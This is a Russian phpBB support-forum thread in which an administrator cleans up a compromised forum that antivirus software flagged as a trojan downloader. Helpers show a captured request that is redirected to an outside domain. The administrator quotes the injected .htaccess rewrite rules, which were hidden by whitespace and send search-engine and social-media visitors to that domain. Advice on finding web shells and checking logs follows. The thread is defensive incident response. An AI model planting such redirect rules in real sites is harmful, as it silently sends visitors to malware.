обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh
Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?
Спасибо.
ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.
http://virusinfo.info/pravila.html
Уважаемые пользователи!
C 7 ноября 2020 года phpBB Group прекратила выпуск обновлений и завершила дальнейшее развитие phpBB версии 3.2.
С 1 августа 2024 года phpBB Group прекращает поддержку phpBB 3.2 на официальном сайте.
Сайт официальной русской поддержки phpBB Guru продолжит поддержку phpBB 3.2 до 31 декабря 2024 года.
С учетом этого, настоятельно рекомендуется обновить конференции до версии 3.3.
C 7 ноября 2020 года phpBB Group прекратила выпуск обновлений и завершила дальнейшее развитие phpBB версии 3.2.
С 1 августа 2024 года phpBB Group прекращает поддержку phpBB 3.2 на официальном сайте.
Сайт официальной русской поддержки phpBB Guru продолжит поддержку phpBB 3.2 до 31 декабря 2024 года.
С учетом этого, настоятельно рекомендуется обновить конференции до версии 3.3.
Как убить Трояна?
Правила форума
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения
Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение
).
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения
Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение
).
-
AdmninsCluba
- phpBB 1.2.1
- Сообщения: 22
- Стаж: 17 лет 8 месяцев
- Благодарил (а): 1 раз
-
MIT
- Former team member
- Сообщения: 2500
- Стаж: 15 лет 2 месяца
- Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
- Благодарил (а): 1 раз
- Поблагодарили: 27 раз
Re: Как убить Трояна?
zeroed, вот твой вирус:
Код: Выделить всё
GET http://ubuntologia.ru/forum/styles/prosilver/template/forum_fn.js HTTP/1.1
Host: ubuntologia.ru
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2
Accept: */*
Referer: http://ubuntologia.ru/forum/search.php?search_id=active_topics
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Cookie: phpbb3_ubun_k=; phpbb3_ubun_sid=bd96ddcb426aac983d5f97f6a2144e48; phpbb3_ubun_u=1
Connection: keep-alive
Connection: keep-aliveКод: Выделить всё
HTTP/1.1 301 Moved Permanently
Date: Fri, 08 Jun 2012 15:22:07 GMT
Server: Apache/2.2.14 (Ubuntu)
Location: http://gagapgeg.ru/haiaig?8
Vary: Accept-Encoding
Content-Length: 315
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://****.ru/haiaig?8">here</a>.</p>
<hr>
<address>Apache/2.2.14 (Ubuntu) Server at ubuntologia.ru Port 80</address>
</body></html>
-
zeroed
- phpBB 1.4.2
- Сообщения: 70
- Стаж: 15 лет 3 месяца
- Откуда: Москва
- Благодарил (а): 1 раз
- Поблагодарили: 1 раз
Re: Как убить Трояна?
Сравнил с помощью WinMerge forum_fn.js и не нашел никакой разницы с исходным файлом из свежескачанного архива с установкой форума.
-
zeroed
- phpBB 1.4.2
- Сообщения: 70
- Стаж: 15 лет 3 месяца
- Откуда: Москва
- Благодарил (а): 1 раз
- Поблагодарили: 1 раз
Re: Как убить Трояна?
MIT,
Спасибо.
Выпилил.
Интересно, стоит где-то еще или нет что-нибудь еще..
Добавлено спустя 1 минуту 54 секунды:
Что было:
В файле .htaccess было вставлено следующее:
причем вставили так, что не было видно, добавили кучу пробелов. нашел в двух местах.
Спасибо.
Выпилил.
Интересно, стоит где-то еще или нет что-нибудь еще..
Добавлено спустя 1 минуту 54 секунды:
Что было:
В файле .htaccess было вставлено следующее:
Код: Выделить всё
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)
RewriteRule ^(.*)$ http://gagapgeg.ru/haiaig?8 [R=301,L]
</IfModule>-
МайскийЖук
- phpBB 3.0.7-PL1
- Сообщения: 2535
- Стаж: 14 лет 7 месяцев
- Поблагодарили: 78 раз
Как убить Трояна?
Зашел. Нажал на любую тему. Никаких вирусов не обнаружил.
Любовь и боль, покой и бой я как любой несу с собой…
-
zeroed
- phpBB 1.4.2
- Сообщения: 70
- Стаж: 15 лет 3 месяца
- Откуда: Москва
- Благодарил (а): 1 раз
- Поблагодарили: 1 раз
Re: Как убить Трояна?
Ну так я его выпилил. Отлично значит :) Всем спасибо. Буду сейчас просматривать бэкапы и смотреть, когда он появился. Может по логам пойму, что произошло.МайскийЖук писал(а):Зашел. Нажал на любую тему. Никаких вирусов не обнаружил.
Добавлено спустя 38 минут 7 секунд:
Только что вернулись все файлы назад..
FTP я отключил, пароли сменил..
Откуда еще могут заходить? Где можно посмотреть логи, кто добавил этот файл?
-
MIT
- Former team member
- Сообщения: 2500
- Стаж: 15 лет 2 месяца
- Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
- Благодарил (а): 1 раз
- Поблагодарили: 27 раз
Re: Как убить Трояна?
Веб-шелл, ищи подозрительные файлы php.zeroed писал(а):Откуда еще могут заходить?
access_log, ищи частые запросы к неизвестным файлам методом POST.zeroed писал(а):Где можно посмотреть логи, кто добавил этот файл?
-
zeroed
- phpBB 1.4.2
- Сообщения: 70
- Стаж: 15 лет 3 месяца
- Откуда: Москва
- Благодарил (а): 1 раз
- Поблагодарили: 1 раз
Re: Как убить Трояна?
Пока я их ищу и удаляю, он создает новые..
Можно как-то скопом все это предотвратить кроме отключения сервака?
Можно как-то скопом все это предотвратить кроме отключения сервака?
-
MIT
- Former team member
- Сообщения: 2500
- Стаж: 15 лет 2 месяца
- Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
- Благодарил (а): 1 раз
- Поблагодарили: 27 раз
Re: Как убить Трояна?
zeroed, можешь на время анализа логов отключить веб-сервер, изучить и удалить подозрительные файлы (скачав их себе на всякий случай), а также проверить странные запросы к файлам движка (длинные GET-запросы, POST-запросы к файлам, которые не должны оные обрабатывать, запросы с того же IP, с которого были запросы к подозрительным файлам и т.п.).
-
zeroed
- phpBB 1.4.2
- Сообщения: 70
- Стаж: 15 лет 3 месяца
- Откуда: Москва
- Благодарил (а): 1 раз
- Поблагодарили: 1 раз
Re: Как убить Трояна?
спасибо, ip нашел и забанил его в системе, сижу ищу файлы
POST к udp это нормально?
POST к udp это нормально?
-
Пчелкин
- phpBB 3.3.0
- Сообщения: 11247
- Стаж: 14 лет 4 месяца
- Откуда: fotovideoforum.ru
- Благодарил (а): 673 раза
- Поблагодарили: 121 раз
Re: Как убить Трояна?
zeroed Ип можно увидеть?
NIKON-D90, AF-S 18-105, AF-S 14-24, AF-S 24-70
Фотовидеофорум ; Форум Кировского района ; Форумы Калдина-Клуба ; Форум Japan Navigation Group
Фотовидеофорум ; Форум Кировского района ; Форумы Калдина-Клуба ; Форум Japan Navigation Group
-
angst66
- phpBB 3.0.0 RC1
- Сообщения: 1472
- Стаж: 12 лет 4 месяца
- Благодарил (а): 48 раз
- Поблагодарили: 71 раз
Re: Как убить Трояна?
Со вчерашнего дня аваст блокирует мой сайт. Другие антивири молчат, я не вижу признаков заражения. Не находят ничего онлай сканнеры. Я написал в поддержку аваста по поводу ложного заражения. Но все таки. Может быть я чего то не вижу. Уважаемые гуру, заражен ли мой форум?
